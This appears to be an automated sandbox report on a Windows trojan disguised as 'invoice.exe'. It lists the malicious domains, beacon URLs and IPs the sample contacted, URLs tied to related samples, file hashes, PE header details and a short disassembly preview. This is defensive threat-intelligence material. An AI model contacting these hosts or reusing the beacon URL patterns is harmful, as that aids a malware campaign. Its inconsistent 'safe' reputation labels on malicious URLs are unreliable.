          SourceDetectionScannerLabelLink
          invoice.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.invoice.exe.29d0000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.invoice.exe.2970000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.invoice.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          rmcfoods.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.rmcfoods.com/saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxNJURkYQ12iJDSWINmeiyVLwn1GCX+dbx0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.laborexchanges.com/saf0/?UnSpxn_=BtLohM+uB3q4k/LlKf4h6h9jKhMOWhQYAUT20pwPFuxXeQimTiRkUGHppPy1CbtFE5UV&nHux40=pRmTZBcPIFQHkvP00%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.nigeriamoney.life/saf0/?UnSpxn_=KK0m7Tuk2BKDUiTVJC/eZPZggliL1QGXIKfUCxB6Gg0A7hnmP0tvgutH2fljjdRiWXxo&nHux40=pRmTZBcPIFQHkvP00%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          https://www.rmcfoods.com/saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxN0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          laborexchanges.com
          		34.102.136.180
          		truetrue
            		unknown
            rmcfoods.com
            		109.73.164.114
            		truetrueunknown
            nigeriamoney.life
            		68.66.248.44
            		truetrue
              		unknown
              www.nigeriamoney.life
              		unknown
              		unknowntrue
                		unknown
                www.rmcfoods.com
                		unknown
                		unknowntrue
                  		unknown
                  www.montesida.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.laborexchanges.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.rmcfoods.com/saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxNJURkYQ12iJDSWINmeiyVLwn1GCX+dbxtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.laborexchanges.com/saf0/?UnSpxn_=BtLohM+uB3q4k/LlKf4h6h9jKhMOWhQYAUT20pwPFuxXeQimTiRkUGHppPy1CbtFE5UV&nHux40=pRmTZBcPIFQHkvP0true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.nigeriamoney.life/saf0/?UnSpxn_=KK0m7Tuk2BKDUiTVJC/eZPZggliL1QGXIKfUCxB6Gg0A7hnmP0tvgutH2fljjdRiWXxo&nHux40=pRmTZBcPIFQHkvP0true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.tiro.comexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.%s.comPAexplorer.exe, 00000004.00000000.666096636.0000000002B50000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		low
                                        http://www.fonts.comexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.rmcfoods.com/saf0/?nHux40=pRmTZBcPIFQHkvP0&UnSpxn_=l0vU6hoQQSceldQJGhZQQ6qERl0xu4TDj5AxNcontrol.exe, 00000006.00000002.925130650.0000000004E2F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sakkal.comexplorer.exe, 00000004.00000000.680205230.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          68.66.248.44
                                          		unknownUnited States
                                          		55293A2HOSTINGUStrue
                                          109.73.164.114
                                          		unknownUnited Kingdom
                                          		33182DIMENOCUStrue
                                          34.102.136.180
                                          		unknownUnited States
                                          		15169GOOGLEUStrue

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:321016
                                          Start date:20.11.2020
                                          Start time:09:13:41
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 23s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:invoice.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:19
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/0@4/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 18.9% (good quality ratio 17.4%)
                                          • Quality average: 76.4%
                                          • Quality standard deviation: 30.5%
                                          HCA Information:
                                          • Successful, ratio: 89%
                                          • Number of executed functions: 88
                                          • Number of non-executed functions: 99
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.193.48, 51.104.144.132, 52.155.217.156, 20.54.26.129, 95.101.22.134, 95.101.22.125
                                          • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          34.102.136.180TR-D45.pdf.exeGet hashmaliciousBrowse
                                          • www.gcvinternational.com/gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi
                                          86dXpRWnFG.exeGet hashmaliciousBrowse
                                          • www.powderedsilk.com/ogg/?FdtP=yL0l42d8z4u&JfspOLvH=fOCM8bU6nldV/iwSncfaF5Bzy/lGPGgo/g5DGIZRlu3EMk3UROnm6TGL4YPAlMSLjacD
                                          LIST OF PRODUCTS NEEDED.exeGet hashmaliciousBrowse
                                          • www.present-motherhood.com/pna/?oXN=7nbLudZHS&wP9=pAJh36KDGKuozQ+wlnL4iaUZacIoIbb12I26NWSsGNXaprJ2jX+VR1VHCYeoOV3CYcpo
                                          Order specs19.11.20.exeGet hashmaliciousBrowse
                                          • www.overstockalpine.com/nwrr/?cj=Nc1MB4yErYgRagn/HzK3hScSsYEBegMtx+kEQv9TefYD7E7OGiE02SCDOI6eM3Hv09tUJ3eV9Q==&Rxo=L6hH4NIhfjzT
                                          Okwt8fW5KH.exeGet hashmaliciousBrowse
                                          • www.mybriefbox.com/sdk/?AP=KzrxE&kzut2Pv=ieC5SQ4WTCMGwLwKeHkkTkUTO60lnbNinIRTqFa5Tgq0ajZ12E69OSpNqOiQRcX/surf
                                          Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                          • www.onlineshoppingisbest.com/igqu/?YnztXrjp=cAw+48JGWTFWiF+zD75YoKcSRGv0/cbX2CyjAL3BYh15xmcIYagPiXPUr4/0BC838prH&sBZxwb=FxlXFP2PHdiD2
                                          Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                          • www.brilliance-automation.com/gyo3/?Ez=XAbIWkmCD7FprhBGM/1VWQtkWKjPoo+hixDnJGBEsGUo9CkrVpkcDmC1vi0ujf808Qfd1id09g==&lhud=TjfdU2S
                                          Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                          • www.rockinglifefromhome.com/igqu/?afo=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORGuicEzVgEw0Hp6jQ==&DHU4SX=gbT8543hIhm
                                          MV.KMTC JEBEL ALI_pdf.exeGet hashmaliciousBrowse
                                          • www.mereziboutique.com/y9z/?uFQl=hX/JgwGUf2blPgyiHp8pkr0UcN4JhiEs10p3+69z9DK69Gln3SJoRK9DZHZ4ze7gp3+f&CTvp=fv10_lYhrxJtW6
                                          SWIFT_HSBC Bank.exeGet hashmaliciousBrowse
                                          • www.homewellliving.com/nt8e/?7nwltvxh=y2sdQ9Xb5ECC4UyPumlTTMs33wxYtaLvB/dO1hyuc+aLkGir7cEA1isigJn19hEFQwDS&org=3foxnfCXOnIhKD
                                          23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                          • www.funeralfermentarium.com/9d1o/?lvH8U=Wears+I1XvB+Lmut0rGzY9wAFTAHH41k5OVIheQSGxmq0oO+QWZXKPOXziEsAnWJSQrEFn+Exw==&E6A=8pDxC4
                                          PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                          • www.guillermoastiazaran.com/sppe/?DnadT=x+bcW4Gq4Sa+8Fw3ruRe02HfSBDGbo9y1yLk6wxIyT1lxw5Q+sxUrgb1tDfRR28VG68C&DxlLi=2dmX
                                          KYC_DOC_.EXEGet hashmaliciousBrowse
                                          • www.packorganically.com/bw82/?CXrL=77CCBBr2/49gWL5yauZnKqdCED7z+VtJXat/kGRZ6Qnjpe6WQ1Ax9xdsmUB8H+4disGx&llvxw=fTAlUHeHDVNhYV
                                          PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                          • www.bullwingsgt.com/sppe/?00D=NB3Dd/vOM6aQ3m0lcddBYOe/MXAC8Z/KQ2ZGmCsq6hDofgl0Po6pPua8TNWmH6LR2TRn&w48H=qBZ83x7XYlyP0lo0
                                          ant.exeGet hashmaliciousBrowse
                                          • www.spidermenroofsupport.com/94sb/?8pMt5xHX=C9biJKOafB1QzsexO7xJmKpRIYJMQj6VpKItH4wgGF+KF++s1hKyu2EaSVFJqiHWuFvG&GzrT=Wb1LdRq8x
                                          PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                          • www.prideaffiliate.com/mua8/?w48t=0pY022IXUBwLfpfP&nflpdH=Vm4JrPClk0aQj+jhcdONVb3zc5GtcUOmsZyrOc+k5NW+jXUcqcFsSwfT9cazrXQd7qcZ
                                          DEBIT NOTE DB-1130.exeGet hashmaliciousBrowse
                                          • www.knotgardenlifestylings.com/ihm3/?sBZ4lrK=PS39z8PEw7TzfNOCiLKd1OXoS8/GfzxzB5O+ulo0NmPTjwXimFWvt/sJkvH86VVEya1bUCOS1g==&FPcT7b=djCDfFRXOP7H
                                          POSH XANADU Order-SP-20-V241e.xlsxGet hashmaliciousBrowse
                                          • www.desk-freely.com/dtn/?lb=tWjSWtdhKEbcvZcDY2Isxp7DhwPqmKrgqV2LL8a+7y46vKpMTXTGiWVbDe2Qat9zzYwG/g==&8ptdvJ=KT0pXTAPFjE0
                                          PI 11172020.xlsxGet hashmaliciousBrowse
                                          • www.yourpassionpurposepower.com/egem/?Ob20Lf_=T+Py0QdJSh8uop0xQluPGRTKd40I+j4T0iQ6z9ArmxF3ClsH1rswXmlXU/F87B5u4zxcgw==&BB6=L48xY
                                          SHIPMENT DOCUMENT.xlsxGet hashmaliciousBrowse
                                          • www.jesussavethelost.com/tlu/?ebc8=E2JdjN_822M&Kpjp=WL9elnUNGmLALDc/aT9Yvopy5IOc6bZx+8KB1+n4COxRyIg81J8N2lucSrbi65xgujJdpg==

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          GOOGLEUSTR-D45.pdf.exeGet hashmaliciousBrowse
                                          • 34.102.136.180
                                          knitted yarn documents.exeGet hashmaliciousBrowse
                                          • 172.253.120.109
                                          86dXpRWnFG.exeGet hashmaliciousBrowse
                                          • 34.102.136.180
                                          https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.phpGet hashmaliciousBrowse
                                          • 172.217.16.130
                                          b0408bca49c87f9e54bce76565bc6518.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          b2e3bd67d738988ca1bbed8d8b3e73fc.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          ad14f913dc65be569277c8c76de608a4.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          b2352353279664cc442f346015e86317.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          ab1671011f681ff09ac0ffd70fc4b92b.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          BetterPoints_v4.60.1_apkpure.com.apkGet hashmaliciousBrowse
                                          • 216.58.212.163
                                          b0e7416dbf03a7359e909c5bd68ae6e1.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          afaa3d5f10a2ea3c2813b3dd1dac8388.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          afbce292dbb11bda3b89b5ff8270bd20.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          aea80fb9d13561d7628b9d2f80a36ad0.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          af8eb3450867384ca855f2f0d0d6ae94.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          ae80b9b86323a612ce7a9c99f5cb65b4.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          ae85c1f45fb26bf61dc41c2a93d29b76.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          adf21651776b58545870cdcb1b2d955b.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          b2592f2f7a2eb53687b3a26249513d6e.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          ad167b5f4bd63100aeb68d12a0d87fae.exeGet hashmaliciousBrowse
                                          • 74.125.34.46
                                          A2HOSTINGUSInquiry-20201118105427.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          EMMYDON.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          OUTSTANDING INVOICE_pdf.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          uM0FDMSqE2.exeGet hashmaliciousBrowse
                                          • 70.32.23.14
                                          VeiRTphBRH.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          qkN4OZWFG6.exeGet hashmaliciousBrowse
                                          • 68.66.216.20
                                          https://pixelksa.com/po/NewfilServices/index.phpGet hashmaliciousBrowse
                                          • 67.209.116.21
                                          https://www.desimealz.com/wp-content/plugins/xnbwwmx/Payment_Report_EFT_FX_FT%202020-13-11.jarGet hashmaliciousBrowse
                                          • 85.187.137.156
                                          kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                          • 68.66.216.20
                                          DHL RECEIPT_pdf.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          RFQ-1324455663 API 5L X 60.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          DHL INVOICE_pdf.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          sxs73zrn8P.exeGet hashmaliciousBrowse
                                          • 85.187.154.178
                                          Zahlung-06.11.20.exeGet hashmaliciousBrowse
                                          • 68.66.224.27
                                          doc_7252.xlsGet hashmaliciousBrowse
                                          • 70.32.23.58
                                          inv-2635.xlsGet hashmaliciousBrowse
                                          • 70.32.23.58
                                          invoice8984.xlsGet hashmaliciousBrowse
                                          • 70.32.23.58
                                          invoice8984.xlsGet hashmaliciousBrowse
                                          • 70.32.23.58
                                          Y9ZpOm6Fvf.xlsGet hashmaliciousBrowse
                                          • 70.32.23.58
                                          Y9ZpOm6Fvf.xlsGet hashmaliciousBrowse
                                          • 70.32.23.58
                                          DIMENOCUSddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).jsGet hashmaliciousBrowse
                                          • 67.23.238.50
                                          ddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).jsGet hashmaliciousBrowse
                                          • 67.23.238.50
                                          Richiesta Urgente.pdf.exeGet hashmaliciousBrowse
                                          • 64.37.52.42
                                          VRVA8aGgQc.exeGet hashmaliciousBrowse
                                          • 138.128.167.210
                                          af6y2Oe5lX.exeGet hashmaliciousBrowse
                                          • 138.128.171.170
                                          https://encrypt.puzzledpuppy.com/Get hashmaliciousBrowse
                                          • 67.23.254.10
                                          iSrBUSEJzI.exeGet hashmaliciousBrowse
                                          • 67.23.242.109
                                          VncDfMvr.exeGet hashmaliciousBrowse
                                          • 138.121.203.205
                                          doc_pack-1177677900.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1176294411.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1176283396.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1150040064.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-116797112.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1152979951.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1172943982.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1168834311.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1175649875.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1161987695.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1141425075.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125
                                          doc_pack-1155391818.xlsGet hashmaliciousBrowse
                                          • 198.49.68.125

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          No created / dropped files found

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.5085570432359425
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:invoice.exe
                                          File size:392704
                                          MD5:c11b21f5c4adcab958c7706cd38f5697
                                          SHA1:9112cb83359d88fde19f16290020fe813ba46b46
                                          SHA256:ca31bf22e81cd78167c74ed368d9e6ffd06a189dacf22e4b007bcb452f5636d4
                                          SHA512:068e2ad21e19246796a81255e2deefe90c2abb817b1a0a3e00a5d0ca5a8817250993ddea82b3e66a65e4dc048fd17c0fb1528e1bff463e886c2f8953094982d1
                                          SSDEEP:6144:/ZzdCjALkRnJtNyToqsnq80C56Q+uKY911qvkBBPMPAvgDfsH5YwVFIovJgu+D0/:/ZzdCcknyToq20C5vKE11qvaBPTqsHfL
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hc..............X.......X.......X..J...P................[.......[...............[......Rich............PE..L...0Z._...........

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x40e57c
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x5FB75A30 [Fri Nov 20 05:54:56 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:0
                                          File Version Major:6
                                          File Version Minor:0
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:0
                                          Import Hash:c35b119ed93d2da3d4093a6e2ea9517c

                                          Entrypoint Preview

                                          Instruction
                                          call 00007FC524B0CFFCh
                                          jmp 00007FC524B039B4h
                                          call 00007FC524B0B42Bh
                                          mov edx, eax
                                          mov eax, dword ptr [edx+6Ch]
                                          cmp eax, dword ptr [0042EA34h]
                                          je 00007FC524B03B42h
                                          mov ecx, dword ptr [0042EAF0h]
                                          test dword ptr [edx+70h], ecx
                                          jne 00007FC524B03B37h
                                          call 00007FC524B0B20Eh
                                          mov eax, dword ptr [eax+04h]
                                          ret
                                          call 00007FC524B0B405h
                                          mov edx, eax
                                          mov eax, dword ptr [edx+6Ch]
                                          cmp eax, dword ptr [0042EA34h]
                                          je 00007FC524B03B42h
                                          mov ecx, dword ptr [0042EAF0h]
                                          test dword ptr [edx+70h], ecx
                                          jne 00007FC524B03B37h
                                          call 00007FC524B0B1E8h
                                          add eax, 000000A0h
                                          ret
                                          call 00007FC524B0B3DDh
                                          mov edx, eax
                                          mov eax, dword ptr [edx+6Ch]
                                          cmp eax, dword ptr [0042EA34h]
                                          je 00007FC524B03B42h
                                          mov ecx, dword ptr [0042EAF0h]
                                          test dword ptr [edx+70h], ecx
                                          jne 00007FC524B03B37h
                                          call 00007FC524B0B1C0h
                                          mov eax, dword ptr [eax+74h]
                                          ret
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 44h
                                          mov eax, dword ptr [0042E748h]
                                          xor eax, ebp
                                          mov dword ptr [ebp-04h], eax
                                          push ebx
                                          push esi
                                          mov esi, dword ptr [ebp+08h]
                                          xor ebx, ebx
                                          mov dword ptr [ebp-2Ch], ebx
                                          mov dword ptr [ebp-20h], ebx
                                          mov dword ptr [ebp-24h], ebx
                                          mov eax, dword ptr [esi+000000A8h]
                                          mov dword ptr [ebp-1Ch], ebx
                                          mov dword ptr [ebp-28h], ebx
                                          mov dword ptr [ebp-44h], esi
